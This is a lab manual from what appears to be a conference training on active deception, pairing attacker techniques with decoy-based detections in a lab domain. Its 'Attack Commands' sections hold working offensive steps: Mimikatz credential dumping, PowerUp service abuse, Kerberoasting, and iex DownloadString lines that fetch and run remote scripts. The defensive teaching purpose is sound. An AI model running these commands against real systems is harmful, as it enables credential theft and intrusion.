(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon

Active Deception
For Red & Blue Teams
Lab Manual & Playbook

Getting Started
The Schedule
External Reconnaissance
#1. DNS recon
#2. Censys.io / Shodan / Crt.sh
#3. Webpage cloning

Privilege Escalation
#5. Lazagne (browser creds / credman)
#6. Find-Interesting-Files
#7. Decoy local privesc service (get SYSTEM)
#8. Mimikatz (LSASS) / runas
#9. GPP Passwords
#10. Kerberoasting
#11. AD Enumeration
#12. User hunting
Lateral Movement
#13. Saved sessions (PuTTY / FTP / file shares / RDP)
#14. Network scanning

Getting Started
Hi and welcome to the class! Here's some information that's important for you to get the most
out of the training.

Chat Room Access
You will be invited to a dedicated Slack chat-room for tech-support issues, in case we want to
share additional reference material, or just to hang out and chat in general. You can also talk
one-to-one with the trainers while the class is offline: https://bit.ly/sacon-active-deception

To get tech-support help, drop a message in #tech-support. To contact a trainer, send a direct
message to:
- @Sudarshan [Trainer]
- @Sahirh [trainer]

Rules of Engagement
While it's totally alright if you explore, please don't break stuff! This means:
- Don't attack other users or abuse the Internet connectivity
- Don't modify configurations / change passwords that might affect the lab, training or
other participant's experience. A general rule of thumb is ‘don't change anything'.
- Don't load external files / tools or malware into the lab. We've included everything you
need to experience the class.

In case you're not sure about whether something is okay, seek clarification on Slack from our
team first. If someone goes rogue, our security team will be forced to disconnect your lab
access so that other folks aren't affected. All Internet activity and packets are logged.

The Schedule

Time Topic Description
8.30 - 9.00 Introduction & Setup Introduce trainers and class takeaways
Introduce participants
Discuss rules of engagement
Setup participant workstations
9.00 - 9.30 Adversarial thinking &
Introduction to deception
Problems in cybersecurity
Thinking like an attacker
The kill-chain
Malware v/s humans
Pyramid of pain
Role-playing attack trees
MILDEC / INFOOPS
Game theory
History of deception in cybersecurity
9:30 - 10:30 DNS recon
Censys.io / Shodan / Crt.sh
Webpage cloning
10.30 - 11.00 Coffee break
11:00 - 11:15 Exploitation Exploit walkthrough
11.30 - 12.30 Privilege escalation Unattend files
Lazagne (browser creds / credman)
Find-Interesting-Files

Decoy local privesc service (get SYSTEM)
Mimikatz (LSASS)
LLMNR NBT-nS poisoning (Video Demo)
12.30 - 14.00 KeyNote + Break
14.00 - 15.30 Privilege Escalation AD introduction
AD enumeration
GPP passwords
Kerberoasting
User hunting / BloodHound
15:30 - 16.00 Coffee break
16.00 - 18.00 Privilege Escalation
Lateral Movement

Privilege Escalation spill over
Lateral Movement techniques
Deception Strategy
Recap

The Kibana logging server is openly accessible on:
http://10.0.20.20:5601

External Reconnaissance
#1. DNS recon

ATT&CK ID
https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1027

Description
DNS reconnaissance helps an attacker discover Internet facing systems that may be exploited.
Different techniques can be used, including sub-domain bruteforcing, reverse lookups on an IP
address space, or exploiting DNS zone transfers.

Deception Technique
Internet facing deception can be used to detect inbound attempts at reconnaissance, and can
pick up attempted credential usage or web application exploitation attempts.

Create unused subdomains from the subdomain lists that attackers commonly use and host
decoys on those subdomains. You can filter out everything except targeted requests using

virtual hosts in web-servers, or watch for specific credential submissions matching your
domain name.

Attack Commands
Working Directory: ToolsWindowsDNSsearch

cd c:userspublictoolsWindowsDNSsearch
dnssearch.exe -domain hallowscorp.com -wordlist words.txt

Open the browser. In the url bar type: http://xamp.hallowscorp.com

Kibana Visualisation
Discovery
Click on open (above the search bar)
Choose 'Recon - Interaction with Web Decoys'
Key in your IP address in the search field to view only your activity

References
https://github.com/evilsocket/dnssearch
https://www.digitalocean.com/community/tutorials/how-to-set-up-nginx-server-blocks-virtual-
hosts-on-ubuntu-16-04
https://github.com/darkoperator/dnsrecon

#2. Censys.io / Shodan / Crt.sh

ATT&CK ID

Description
It's possible to passively conduct reconnaissance to discover a company's Internet facing
presence. Sites like Shodan scan the entire Internet, cataloging what they see. Censys allows
you to search the parameters within publicly visible SSL certificates, and Crt.SH lets you
search SSL certificate transparency lists.

Deception Technique
HTTPS decoys can be created with SSL certificates that contain interesting Common Names.
These will be indexed by sites like Censys. Configure the webserver serving these decoys to

only respond to requests for those hostnames. Any attempt to connect to those hosts implies
the attacker discovered the SSL certificates through reconnaissance.

Attack Commands
Open the browser
Browse to https://www.shodan.io/search?query=vnc
Browse to https://censys.io/ and enter your company domain name
Browse to https://crt.sh/ and enter your company domain name

N/A

References
https://www.digitalocean.com/community/tutorials/how-to-create-a-self-signed-ssl-certificate-
for-nginx-in-ubuntu-16-04

#3. Webpage cloning

ATT&CK ID
https://attack.mitre.org/wiki/Technique/T1192

Description
When setting up spear-phishing pages, an attacker will look for organisation-specific login web
portals to clone and re-host. They then spear-phish their targets with links to the cloned sites in
order to harvest credentials.

Deception Technique
We embed a snippet of JavaScript in the webpage which checks to see whether the current
domain that the HTML is loaded from matches the expected domain where it should be
hosted. If the current domain and the expected domain don't match, it means the page is
being re-hosted, and the script makes a callback to a defined URL to inform us that it has been
cloned. The JavaScript can be obfuscated and hidden within existing JavaScript files in order
to make it hard to identify.

Attack Commands
Create a folder on the desktop called "Clone"
Open the browser
Browse to http://xamp.hallowscorp.com
On the browser window press Ctrl+S
Save the file to the desktop (Ensure the 'Save as' type reads '(WebPage Complete)'

Open command prompt
cd %userprofile%desktopClone
double click on index.html


Discover
Click on 'Open' above the search bar
Choose 'Recon - Detect Cloning'
Key in your IP address in the search bar to view the hit

References
http://canarytokens.org/generate

Privilege Escalation

#4. Unattend files

ATT&CK ID

Description
When an attacker gains access to a workstation, they're usually running with the privileges of
the current user, who may not have local administrator rights.

The first step of the double cycle pattern in privilege escalation is to gain local administrator
rights, so that the attacker can dump credentials from memory, install different types of
persistence (such as scheduled tasks or WMI subscriptions) and -- if the attacker is lucky -- the
local administrator credentials may be shared across workstations, allowing for immediate
lateral movement without targeting the domain at all.

Windows Unattend.xml or sysprep.xml files are used for unattended (scripted) Windows
installations, and can contain encoded versions of the local administrator password that allow
our attacker to escalate privileges.

Deception Technique
We drop decoy unattend.xml or sysprep.xml files on the disk in places where they will be found
by someone looking to escalate privileges. We enable file level auditing of these files in order to
identify the attempt, as well as the process that is trying to read the files.

Attack Commands
Working Directory: ToolsPowershell

Open command prompt

cd c:userspublictoolspowershell
powershell -exec bypass
Import-module .powerup.ps1
Get-UnattendedInstallFile

An unattend file will be discovered. Open or copy the file
notepad C:WindowsPantherunattend.xml


Discover
Open the Kibana search 'Endpoint Deception - Unattend Files'
Key in your username in the search bar and view the hit

References
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/

#5. Lazagne (browser creds / credman)

ATT&CK ID

Description
Credential theft from a host encompasses both federated (domain) credentials, as well as
application specific credentials, especially those stored in browsers or the registry.

Attackers dump these credentials in order to escalate privileges horizontally, gaining access to
additional applications (and attack surface) that the user has rights to. Tools like Lazagne dump
saved credentials from a wide range of applications.

Deception Technique
By dropping fake credentials in applications like browsers, we have a great way to give the
attacker their next-hop in the lateral movement process. For example, we can create a decoy
web application, and drop fake credentials in the browser pointing to the decoy IP or
hostname. An attacker who dumps credentials will try to use them on the application, revealing
not just their presence, but also the point of compromise (if each user has different credentials
saved).

The same idea can be extended to database clients, remote desktop sessions, SSH sessions
etc.

Attack Commands
Working Directory: ToolsWindowsLazagne.exe

cd c:userspublictoolswindows

Lazagne.exe all
You will find credentials, try to use ftp credentials in the browser
In you browser go to ftp://10.0.10.30 and key in your username and credentials
Discover
Open the Kibana search 'Privilege Escalation - Lazagne Browser Credetials'
Key in the username your internal IP address in the search bar and view the hit
#6. Find-Interesting-Files

ATT&CK ID

Description
Seasoned attackers want to quickly identify information of value on the host system. Rapidly
identifying files containing interesting names or content is a great starting point. Typically,
they'll perform keyword searches that are specific to their campaign, or with more generic
words likes 'password', 'login' etc.

They can either use direct filesystem searches, or leverage the Windows Search Indexer
service to search faster.

Deception Technique
We can create decoy files (either beacon files, or with filesystem auditing) containing interesting
keywords in the name. When the attacker searches for interesting files, they will encounter our
decoy files and either access or copy them, triggering the alert.

The files can be made hidden to the normal user, so they don't accidentally trigger them.
Alternatively, we can have a higher privilege user directory containing these files. The inability
to access this directory will make an attacker attempt to escalate privileges. If they succeed,
they will then be highly motivated to browse the previously inaccessible folder, and will trigger
the alerts.

Attack Commands
Working directory: ToolsPowershell
Open command prompt

cd c:userspublictoolsPowershell
iex (New-Object System.Net.Webclient).DownloadString("http://bit.ly/1pzQCnv")

cd c:Userspublic
Find-InterestingFile
Copy the path that shows passwords.txt or open the file.
notepad C:userspublicConfidential Filespasswords.txt


Discover
Open the Kibana search 'Privilege Escalation - Find Interesting Files'
Key in your username and check for the hit.

#7. Decoy local privesc service (get SYSTEM)

ATT&CK ID

Description
Windows stores local service configuration information in the Registry under
HKLMSYSTEMCurrentControlSetServices. The information stored under a service's Registry
keys can be manipulated to modify a service's execution parameters through tools such as the
service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through
Access Control Lists and permissions.

If the permissions for users and groups are not properly set and allow access to the Registry
keys for a service, then adversaries can change the service binPath/ImagePath to point to a
different executable under their control. When the service starts or is restarted, then the
adversary-controlled program will execute, allowing the adversary to gain persistence and/or
privilege escalation to the account context the service is set to execute under (local/domain
account, SYSTEM, LocalService, or NetworkService).

Deception Technique
We create a vulnerable service that an attacker can modify and use registry auditing to watch
for attempts to modify the ImagePath. Privilege escalation attempts will immediately be
identified when the attacker changes the ImagePath.

Most public tools don't even check whether the vulnerable service grants us higher privileges,
however, we could take the deception a step further and run the service under a user that
looks interesting (such as ITBACKUP) but actually has no real privileges.

Attack Commands
Working directory: ToolsPowershell

Open Command Prompt and type:

Browse to ToolsPowershell and then type:

Import-Module .PowerUp.ps1
Invoke-AllChecks -verbose
Invoke-ServiceAbuse -Name "Antivirus" -UserName "hallows<yourusername>"
net localgroup administrators
Check if your username can be seen. Start a new shell and complete the privilege escalation.

#8. Mimikatz (LSASS) / runas

ATT&CK ID

Description
Mimikatz is the Swiss Army knife of Windows privilege escalation. In its most common
invocation, it will dump stored credentials or hashes from multiple sources, including the
windows Credential Manager, and from the LSASS security subsystem.

Deception Technique
We can use the /NETONLY flag to RunAs to create a process with a set of credentials that are
only used for remote access. Windows does not authenticate these credentials at the time we
use RunAs, but will store the access token in memory where it can be discovered.

This lets us place a decoy account into the LSASS with a password that does not have to be
real. When an attacker discovers and attempts to use this account, a login failure event will be
generated. The account can be a real domain account which is part of a high-privilege group,
but has its rights removed.

Attack Commands
Working Directory: toolswindowsmimikatz-trunkx64
cd c:userspublictoolswindowsmimikatz_trunkx64

Step 1: Open a new command prompt (important: make sure you've successfully become local
admin in the demo above)
runas /netonly /user:hallowsdomadm cmd.exe
In the prompt type "hallows@123"

Step 2:
Open new cmd prompt (Right-click runas administrator)
Browse to working directory:.
cd c:userspublictoolswindowsmimikatz_trunkx64
Mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Find the password that username and password you entered with the /netonly command.
mimikatz # exit
runas /u:hallowsdomadm cmd
Type password: hallows@123

Discover
Open the kibana search "End-Point Deception - Honey LSASS Credentials"
Key in your username to view the hit

References
https://adsecurity.org/?p=2207

#9. GPP Passwords

ATT&CK ID

Description
Microsoft's Group Policy Preferences allows administrators to store and use credentials
through XML files on the SYSVOL folder. This capability is used to create scheduled tasks, or
set local administrator passwords.

While the passwords in the XML files are AES encrypted, Microsoft released the decryption key
publicly
(https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx). This
method of storing and using credentials is deprecated, however administrators continue to use
it without realising the implications -- any domain user can access the SYSVOL folder and can
extract and decrypt the passwords from the XML files. The credentials usually work for all OUs
that the group policy is applied to, making it a great low hanging fruit for privilege escalation
and discovery of next-hop targets for lateral movement.

Deception Technique
We create a decoy groups.xml file containing a decoy set of local administrator GPP
credentials. We then map some of our network decoys into an OU. If an attacker enumerates
GPP passwords, they will discover the fake credentials, and then follow the OU to discover
which systems they apply to.

We can detect this in multiple ways. The first order detection is auditing on the decoy
groups.xml file in the SYSVOL folder. The second order detection is when they try to login to
the decoys with the fake GPP credentials, we discover their activity.

A host based method is also possible -- GPP files are locally cached, so we can implement the
same technique using a decoy locally cached groups.xml file. This decoy will be triggered in
the same way as a decoy unattend.xml file.

Attack Commands
Import-Module .Get-GPPPassword.ps1
Get-GPPPassword
Get-DomainOU -GPLink '5C5EBE56-8325-40A7-9093-1A3E87A3152E' | %
{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
net use hcwkst-27 "pass@123" /u:workgroupithelpdesk

Discover
Open the kibana search "AD Deception - GPP Second order detection"

Key in your username to view the hit

References

#10. Kerberoasting

ATT&CK ID

Description
To enable authentication, Kerberos requires service principal names (SPNs) to be associated
with service accounts (accounts specifically created to run services).

Domain users can enumerate SPNs and can request Kerberos TGS tickets from any SPN.
Tickets can be RC4 encrypted and vulnerable to offline cracking. If the attacker succeeds in
cracking the RC4 encrypted ticket, they gain access to the service account.

Deception Technique
We create a decoy service account and set an SPN on it. We then enable logging of Kerberos
TGS service ticket requests and track any event ID 4769 for our decoy user. Note that 4769
generates a very large amount of logging.

Attack Commands
Invoke-Kerberoast

Discover
Open the kibana search "AD Deception - Kerberoasting"
Key in your IP address to view the hit
References
https://www.trustedsec.com/2018/05/art_of_kerberoast/

https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/

#11. AD Enumeration

ATT&CK ID

Description
Active Directory is the 'phone book' of the enterprise for the modern attacker. Active Directory
reconnaissance is stealthier than network scans, and since it maps the organisation's user /
computer and organisational hierarchies, it is a goldmine to identify targets and move laterally.

Most enumeration in Active Directory focuses on finding high-value target users and
computers.

Deception Technique
We can use Active Directory to create decoy objects including users, organisational units,
computer, service principal names and more. Most of the AD deception is focused on giving
the attacker something they're looking for, for example, users with the word 'admin' in their
name, or with an AdminCount attribute.

However, we can also get triggers on Active Directory enumeration. Attack tools query very
specific object attributes (for example, the UserAccountControl attribute on user objects). We
can create decoy users / computers in AD, and monitor any attempt to read these specific
attributes.

Attack Commands

Basic Domain Awareness
Get-Domain
Get-DomainController
How to find critical users & Groups
Get-DomainUser
Get-DomainUser *admin* | Select samaccountname

Get-DomainUser -AdminCount
Get-DomainUser -Properties HomeDir
Get-DomainUser -SPN
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"
How to find critical users
How to find interesting OU, GPOs and Subnets
Get-DomainOU | select name
Find interesting subnets
Get-DomainSubnet | select name,description
How to find interesting computers
Get-DomainComputer
Get-DomainComputer -SPN * | select cn,serviceprincipalname
Get-DomainComputer -Unconstrained | select cn

#12. User hunting

ATT&CK ID

Description
One of the most common techniques an attacker performs post-exploitation is hunting for
high-value target users and the machines they are logged on to. The most common example of
this is the 'derivative domain admin' process, of moving laterally to a machine, escalating
privileges, and incrementally moving on to other systems it controls, finally ending with Domain
Administrator credentials, which have access to the entire Windows domain.

Getting domain admin is not necessary though, often, a pre-selected list of high-value target
users (senior management, application developers, sales personnel) are chosen, and the
attacker hunts them on the network.

Deception Technique

We want to shorten the attack graph for a user hunting attack. In other words, we want to
represent that high-value target users are logged in to places where they aren't in order to
mislead attackers into targeting our decoy machines or users.

When the attacker views their attack graph, they will find the shortest path to their goal is
through compromising deceptive users and computers. Here are two techniques we will use:

1. Decoy logged on user (RegEnumKey):
Get a list of domain admins
Get-DomainGroupMember "Domain Admins" | select membername

Choose any domain admin from the list.
Get-DomainUser domadm
Copy the objectsid property: S-1-5-21-3983302610-2669309802-2036920492-1198

Open regedit and navigate to HKEY_USERS
Right click on the key name below S-1-5-20 and select 'Copy key name'

Now open command prompt as an administrator and save the contents of the decoy hive:
reg save <paste copied key name> deceive.dat
Load the decoy hive into a key with the SID of the domain admin:
reg load HKEY_USERSS-1-5-21-3983302610-2669309802-2036920492-1198
deceive.dat

2. Decoy logged on session (NetWkstaUserEnum):
To create a decoy logged on session, open command prompt and type:
Runas /netonly /u:hallowsdomadm cmd

Now, any attacker that has local administrator access over this machine will believe that a
domain administrator is logged into the machine. Run this command on a network decoy, and
allow domain users administrative access on the system.

Attack Commands
And first try session enumeration:
Now try logged on user enumeration:

iex (New-Object
System.Net.Webclient).DownloadString("https://raw.githubusercontent.com/Blood
HoundAD/BloodHound/master/Ingestors/SharpHound.ps1")
Invoke-Bloodhound -CollectionMethod all,loggedon
OR
Cd C:UsersPublicToolsWindows
Psloggedon.exe hcwkst-27

Double click on this exe
C:UsersPublicToolsWindowsBloodHound-win32-x64BloodHound.exe
Now follow the instructor's screen in front of you
References:
https://github.com/BloodHoundAD/BloodHound

Lateral Movement

#13. Saved sessions (PuTTY example)

ATT&CK ID

Description
One of the stealthiest ways to move around the network is to discover what applications the
compromised user uses legitimately, and then use those applications / protocols to connect to
the same systems with the user's credentials.

Many users save their application sessions / passwords for convenience, and attackers can
enumerate these credentials, and discover where the sessions are used. For example, we can
find saved SSH credentials and the SSH servers that they point to.

Deception Technique
We place decoy application sessions and credentials on every workstation, in order to mislead
attackers looking for their next hop in the lateral movement cycle. These decoy application
sessions point to network decoys running the advertised services.

If we use individually unique username / password combinations, not just can we discover that
a host has been compromised through the network connection attempt, but we can also
attribute the source of the breach to the system where the decoy application session /
credentials were placed originally, even if the attacker uses them from another staging system.

The network decoys themselves are highly instrumented, so whatever commands / code the
attacker executes after he attempts to move laterally will also be captured.

Attack Commands

Putty (SSH)

Import-Module .putty-extractor.ps1

ssh admin@10.0.10.40
Guess the password !


Discover
Open the Kibana search 'Lateral Movement - SSH'
Key in your internal IP Address and check for the hit.

#14. Network scanning

ATT&CK ID

Description
Network scanning may seem like an old, outdated technique, however, it's still extremely
effective, especially in places where compensating detection controls have been focused on
user / computer behaviour, or in networks that don't use Windows (for example, server zones).

Simple port scanning within the local subnet is usually quite stealthy and can give the attacker
immediate situational awareness. Once they get comfortable with the broad network layout,
they can start slowly scanning remote ranges for specific ports in order to find systems that are
not exposed through the current user's activity.

Deception Technique
We can use recent advances in container virtualisation (like Docker on GNU/Linux) in order to
create network decoy services at scale. Docker containers can be spun up cheaply,
orchestrated, and individually configured, in order to create a highly realistic looking deception
environment populated with hundreds of fake systems.

Windows decoys can be regular Windows virtual machines that have additional logging and
auditing enabled in order to generate telemetry on whatever the attacker attempts to execute.

We can also use NSM (network security monitoring) systems such as Bro-IDS to log and
dissect packets inbound to the decoys.

Attack Commands
Working Directory: DesktopToolsWindowsnetscan-x86-64.exe

In IPv4 From: 10.0.10.0 to 10.0.20.250

Click option -> Program Options -> Ports
Check the box on 'Check for open TCP ports' and add
80,445,3306,22,21,23

You will probably find a MySQL Server or http server or ssh port open.

Open C:UsersPublicToolsWindowsHeidiSQLheidisql.exe and enter the MySQL Server IP
Address you discover in the netscan.


Discover
Open the Kibana search 'Lateral Movement - MySQL'
Key in your internal IP Address and check for the hit.

References
N/A

(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon

More Related Content

What's hot

Similar to (SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon

More from Priyanka Aash

Recently uploaded

(SACON) Sudarshan Pisupati & Sahir Hidayatullah - active deception sacon